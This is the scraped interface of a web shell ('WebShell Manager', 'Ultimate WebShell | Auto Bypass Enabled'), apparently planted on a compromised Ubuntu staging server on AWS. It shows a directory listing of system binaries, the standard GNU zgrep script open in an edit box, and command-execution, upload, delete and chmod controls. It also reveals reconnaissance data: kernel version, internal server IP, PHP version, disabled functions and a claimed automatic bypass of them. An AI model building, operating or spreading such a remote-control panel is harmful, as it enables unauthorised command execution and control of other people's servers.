WebShell Manager
Linux Stag-Enterprise-Staging-20-04 5.11.0-1019-aws #20~20.04.1-Ubuntu SMP Tue Sep 21 10:40:39 UTC 2021 x86_64
Apache
Server: 172.31.9.152
Your IP: 216.73.216.236
System Info
HOME
snap
core18
2999
bin
Command Execution
Execute
File Upload
Upload
New Folder
New File
Name
Type
Size
Permissions
Modified
Actions
..
Parent
-
drwxr-xr-x
2026-02-04 00:15:24
-
bash
File
1.06 MB
0755
2022-04-18 15:08:18
bunzip2
File
34.07 KB
0755
2019-07-04 12:35:36
bzcat
File
34.07 KB
0755
2019-07-04 12:35:36
bzcmp
File
2.09 KB
0755
2019-07-04 12:35:36
bzdiff
File
2.09 KB
0755
2019-07-04 12:35:36
bzegrep
File
3.56 KB
0755
2019-07-04 12:35:36
bzexe
File
4.76 KB
0755
2019-07-04 12:35:36
bzfgrep
File
3.56 KB
0755
2019-07-04 12:35:36
bzgrep
File
3.56 KB
0755
2019-07-04 12:35:36
bzip2
File
34.07 KB
0755
2019-07-04 12:35:36
bzip2recover
File
13.99 KB
0755
2019-07-04 12:35:36
bzless
File
1.27 KB
0755
2019-07-04 12:35:36
bzmore
File
1.27 KB
0755
2019-07-04 12:35:36
cat
File
34.24 KB
0755
2018-01-18 09:43:49
chgrp
File
62.18 KB
0755
2018-01-18 09:43:49
chmod
File
58.21 KB
0755
2018-01-18 09:43:49
chown
File
66.18 KB
0755
2018-01-18 09:43:49
cp
File
138.21 KB
0755
2018-01-18 09:43:49
dash
File
118.59 KB
0755
2018-01-25 07:14:33
date
File
98.21 KB
0755
2018-01-18 09:43:49
dd
File
74.22 KB
0755
2018-01-18 09:43:49
df
File
82.79 KB
0755
2018-01-18 09:43:49
dir
File
130.66 KB
0755
2018-01-18 09:43:49
dmesg
File
70.31 KB
0755
2020-09-16 18:43:15
dnsdomainname
File
18.07 KB
0755
2018-01-31 12:08:15
domainname
File
18.07 KB
0755
2018-01-31 12:08:15
echo
File
34.18 KB
0755
2018-01-18 09:43:49
egrep
File
28 B
0755
2019-09-18 15:00:16
false
File
30.18 KB
0755
2018-01-18 09:43:49
fgrep
File
28 B
0755
2019-09-18 15:00:16
findmnt
File
63.27 KB
0755
2020-09-16 18:43:15
grep
File
214.31 KB
0755
2019-09-18 15:00:16
gunzip
File
2.25 KB
0755
2022-04-08 11:12:17
gzexe
File
5.86 KB
0755
2022-04-08 11:12:17
gzip
File
99.18 KB
0755
2022-04-08 11:12:17
hostname
File
18.07 KB
0755
2018-01-31 12:08:15
ip
File
545.12 KB
0755
2021-01-26 13:33:08
journalctl
File
62.09 KB
0755
2024-08-16 14:54:17
kill
File
26.08 KB
0755
2023-10-31 11:35:42
kmod
File
146.18 KB
0755
2020-07-28 14:46:39
less
File
166.76 KB
0755
2024-04-28 11:42:19
lessecho
File
10.02 KB
0755
2024-04-28 11:42:19
lessfile
File
8.36 KB
0755
2024-04-28 11:42:19
lesskey
File
19.39 KB
0755
2024-04-28 11:42:19
lesspipe
File
8.36 KB
0755
2024-04-28 11:42:19
ln
File
66.22 KB
0755
2018-01-18 09:43:49
login
File
51.43 KB
0755
2024-02-06 12:31:54
loginctl
File
50.08 KB
0755
2024-08-16 14:54:17
ls
File
130.66 KB
0755
2018-01-18 09:43:49
lsblk
File
82.08 KB
0755
2020-09-16 18:43:15
lsmod
File
146.18 KB
0755
2020-07-28 14:46:39
mkdir
File
78.18 KB
0755
2018-01-18 09:43:49
mknod
File
66.18 KB
0755
2018-01-18 09:43:49
mktemp
File
42.18 KB
0755
2018-01-18 09:43:49
more
File
38.04 KB
0755
2020-09-16 18:43:15
mount
File
42.08 KB
4755
2020-09-16 18:43:15
mountpoint
File
14.07 KB
0755
2020-09-16 18:43:15
mv
File
134.22 KB
0755
2018-01-18 09:43:49
nc
File
34.48 KB
0755
2018-05-14 12:24:33
nc.openbsd
File
34.48 KB
0755
2018-05-14 12:24:33
netcat
File
34.48 KB
0755
2018-05-14 12:24:33
networkctl
File
42.07 KB
0755
2024-08-16 14:54:17
nisdomainname
File
18.07 KB
0755
2018-01-31 12:08:15
pidof
File
26.38 KB
0755
2020-02-13 18:38:21
ping
File
62.91 KB
4755
2019-06-28 11:05:23
ping4
File
62.91 KB
4755
2019-06-28 11:05:23
ping6
File
62.91 KB
4755
2019-06-28 11:05:23
ps
File
130.3 KB
0755
2023-10-31 11:35:42
pwd
File
34.18 KB
0755
2018-01-18 09:43:49
rbash
File
1.06 MB
0755
2022-04-18 15:08:18
readlink
File
42.18 KB
0755
2018-01-18 09:43:49
rm
File
62.21 KB
0755
2018-01-18 09:43:49
rmdir
File
42.18 KB
0755
2018-01-18 09:43:49
run-parts
File
18.32 KB
0755
2017-12-30 18:15:02
sed
File
106.45 KB
0755
2018-01-30 02:49:51
sh
File
118.59 KB
0755
2018-01-25 07:14:33
sh.distrib
File
118.59 KB
0755
2018-01-25 07:14:33
sleep
File
34.18 KB
0755
2018-01-18 09:43:49
ss
File
136.63 KB
0755
2021-01-26 13:33:08
stty
File
74.21 KB
0755
2018-01-18 09:43:49
su
File
43.62 KB
4755
2024-02-06 12:31:54
sync
File
34.18 KB
0755
2018-01-18 09:43:49
systemctl
File
178.08 KB
0755
2024-08-16 14:54:17
systemd
File
1.55 MB
0755
2023-03-02 12:58:02
systemd-ask-password
File
10.08 KB
0755
2024-08-16 14:54:17
systemd-escape
File
14.06 KB
0755
2024-08-16 14:54:17
systemd-hwdb
File
82.35 KB
0755
2024-08-16 14:54:17
systemd-inhibit
File
14.08 KB
0755
2024-08-16 14:54:17
systemd-machine-id-setup
File
18.06 KB
0755
2024-08-16 14:54:17
systemd-notify
File
14.07 KB
0755
2024-08-16 14:54:17
systemd-sysusers
File
42.07 KB
0755
2024-08-16 14:54:17
systemd-tmpfiles
File
70.07 KB
0755
2024-08-16 14:54:17
systemd-tty-ask-password-agent
File
26.07 KB
0755
2024-08-16 14:54:17
tar
File
413.39 KB
0755
2023-12-05 05:18:12
tempfile
File
9.87 KB
0755
2017-12-30 18:15:02
touch
File
86.21 KB
0755
2018-01-18 09:43:49
true
File
30.18 KB
0755
2018-01-18 09:43:49
udevadm
File
574.4 KB
0755
2024-08-16 14:54:17
umount
File
26.07 KB
4755
2020-09-16 18:43:15
uname
File
34.21 KB
0755
2018-01-18 09:43:49
uncompress
File
2.25 KB
0755
2022-04-08 11:12:17
vdir
File
130.66 KB
0755
2018-01-18 09:43:49
wdctl
File
30.08 KB
0755
2020-09-16 18:43:15
which
File
946 B
0755
2017-12-30 18:15:02
ypdomainname
File
18.07 KB
0755
2018-01-31 12:08:15
zcat
File
1.89 KB
0755
2022-04-08 11:12:17
zcmp
File
1.74 KB
0755
2022-04-08 11:12:17
zdiff
File
5.65 KB
0755
2022-04-08 11:12:17
zegrep
File
140 B
0755
2022-04-08 11:12:17
zfgrep
File
140 B
0755
2022-04-08 11:12:17
zforce
File
2.08 KB
0755
2022-04-08 11:12:17
zgrep
File
6.3 KB
0755
2022-04-08 11:12:17
zless
File
1.99 KB
0755
2022-04-08 11:12:17
zmore
File
1.87 KB
0755
2022-04-08 11:12:17
znew
File
4.95 KB
0755
2022-04-08 11:12:17
0
items selected
Choose Action...
Delete Selected
Zip Selected
Unzip Selected
Execute Action
Clear Selection
© Ultimate WebShell | Auto Bypass Enabled
Create New Folder
Create New File
Edit File: zgrep
#!/bin/sh # zgrep -- a wrapper around a grep program that decompresses files as needed # Adapted from a version sent by Charles Levert <charles@comm.polymtl.ca> # Copyright (C) 1998, 2001, 2002, 2006, 2007, 2009, 2010 Free Software # Foundation # Copyright (C) 1993 Jean-loup Gailly # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3 of the License, or # (at your option) any later version. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License along # with this program; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. bindir='/bin' case $1 in --__bindir) bindir=${2?}; shift; shift;; esac PATH=$bindir:$PATH grep='${GREP-'\''/bin/grep'\''}' args= version='zgrep (gzip) 1.6 Copyright (C) 2010-2013 Free Software Foundation, Inc. This is free software. You may redistribute copies of it under the terms of the GNU General Public License <http://www.gnu.org/licenses/gpl.html>. There is NO WARRANTY, to the extent permitted by law. Written by Jean-loup Gailly.' usage="Usage: $0 [OPTION]... [-e] PATTERN [FILE]... Look for instances of PATTERN in the input FILEs, using their uncompressed contents if they are compressed. OPTIONs are the same as for 'grep'. Report bugs to <bug-gzip@gnu.org>." # sed script to escape all ' for the shell, and then (to handle trailing # newlines correctly) append ' to the last line. escape=' s/'\''/'\''\\'\'''\''/g $s/$/'\''/ ' operands= have_pat=0 files_with_matches=0 files_without_matches=0 no_filename=0 with_filename=0 while test $# -ne 0; do option=$1 shift optarg= case $option in (-[0123456789EFGHIKLPRTUVZabchilnoqrsuvwxyz]*[!0123456789]*) arg2=-\'$(LC_ALL=C expr "X$option" : 'X-.[0-9]*\(.*\)' | LC_ALL=C sed "$escape") eval "set -- $arg2 "'${1+"$@"}' option=$(LC_ALL=C expr "X$option" : 'X\(-.[0-9]*\)');; (--binary-*=* | --[lm]a*=* | --reg*=*) ;; (-[ABCDXdefm] | binary-* | --file | --[lm]a* | --reg*) case ${1?"$option option requires an argument"} in (*\'*) optarg=" '"$(printf '%s\n' "$1" | LC_ALL=C sed "$escape");; (*) optarg=" '$1'";; esac shift;; (-f?*\'*) optarg=" '"$(LC_ALL=C expr "X$option" : 'X-f\(.*\)' | LC_ALL=C sed "$escape") option=-f;; (-f?*) optarg=" '"$(LC_ALL=C expr "X$option" : 'X-f\(.*\)')\' option=-f;; (--file=*\'*) optarg=" '"$(LC_ALL=C expr "X$option" : 'X--file=\(.*\)' | LC_ALL=C sed "$escape") option=--file;; (--file=*) optarg=" '"$(LC_ALL=C expr "X$option" : 'X--file=\(.*\)')\' option=--file;; (--) break;; (-?*) ;; (*) case $option in (*\'*) operands="$operands '"$(printf '%s\n' "$option" | LC_ALL=C sed "$escape") ;; (*) operands="$operands '$option'";; esac ${POSIXLY_CORRECT+break} continue;; esac case $option in (-[drRzZ] | --di* | --exc* | --inc* | --rec* | --nu*) printf >&2 '%s: %s: option not supported\n' "$0" "$option" exit 2;; (-e* | --reg*) have_pat=1;; (-f | --file) # The pattern is coming from a file rather than the command-line. # If the file is actually stdin then we need to do a little # magic, since we use stdin to pass the gzip output to grep. # Turn the -f option into an -e option by copying the file's # contents into OPTARG. case $optarg in (" '-'" | " '/dev/stdin'" | " '/dev/fd/0'") option=-e optarg=" '"$(sed "$escape") || exit 2;; esac have_pat=1;; (--h | --he | --hel | --help) echo "$usage" || exit 2 exit;; (-H | --wi | --wit | --with | --with- | --with-f | --with-fi \ | --with-fil | --with-file | --with-filen | --with-filena | --with-filenam \ | --with-filename) with_filename=1 continue;; (-l | --files-with-*) files_with_matches=1;; (-L | --files-witho*) files_without_matches=1;; (-h | --no-f*) no_filename=1;; (-V | --v | --ve | --ver | --vers | --versi | --versio | --version) echo "$version" || exit 2 exit;; esac case $option in (*\'?*) option=\'$(printf '%s\n' "$option" | LC_ALL=C sed "$escape");; (*) option="'$option'";; esac args="$args $option$optarg" done eval "set -- $operands "'${1+"$@"}' if test $have_pat -eq 0; then case ${1?"missing pattern; try \`$0 --help' for help"} in (*\'*) args="$args -- '"$(printf '%s\n' "$1" | LC_ALL=C sed "$escape");; (*) args="$args -- '$1'";; esac shift fi if test $# -eq 0; then set -- - elif test 1 -lt $# && test $no_filename -eq 0; then with_filename=1 fi l_e=$(eval "(echo e | $grep -H --label=l e) 2>/dev/null") && test "$l_e" = l:e gnuish_grep="test $? -eq 0" if $gnuish_grep && test $with_filename -eq 1; then grep="$grep -H" fi exec 3>&1 res=0 for i do # Fail if gzip or grep (or sed) fails. gzip_status=$( exec 5>&1 (gzip -cdfq -- "$i" 5>&-; echo $? >&5) 3>&- | if test $files_with_matches -eq 1; then eval "$grep$args" >/dev/null && { printf '%s\n' "$i" || exit 2; } elif test $files_without_matches -eq 1; then eval "$grep$args" >/dev/null || { r=$? if test $r -eq 1; then printf '%s\n' "$i" || r=2 fi exit $r } elif $gnuish_grep && test "$i" != -; then eval "$grep --label \"\$i\"$args" elif $gnuish_grep || test $with_filename -eq 0; then eval "$grep$args" else case $i in (*' '* | *'&'* | *'\'* | *'|'*) icolon=$(printf '%s\n' "$i:" | LC_ALL=C sed -e 's/[&\|]/\\&/g' -e '$!s/$/\\/');; (*) icolon="$i:";; esac sed_script="s|^|$icolon|" # Fail if grep or sed fails. r=$( exec 4>&1 (eval "$grep$args" 4>&-; echo $? >&4) 3>&- | LC_ALL=C sed "$sed_script" >&3 4>&- ) && exit $r r=$? test 1 -lt $r && exit $r || exit 2 fi >&3 5>&- ) r=$? test 128 -lt $r && exit $r test "$gzip_status" -eq 0 || test "$gzip_status" -eq 2 || r=2 test $res -lt $r && res=$r done exit $res
Rename
Change Permissions
Common permissions: 755 (rwxr-xr-x), 644 (rw-r--r--), 777 (rwxrwxrwx)
System Information
Uname: Linux Stag-Enterprise-Staging-20-04 5.11.0-1019-aws #20~20.04.1-Ubuntu SMP Tue Sep 21 10:40:39 UTC 2021 x86_64 Software: Apache PHP Version: 7.4.3-4ubuntu2.29 Protocol: HTTP/1.1 Server IP: 172.31.9.152 Your IP: 216.73.216.236 Mail: ON Curl: ON Owner: www-data MySQL: ON Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, Auto Bypass: ENABLED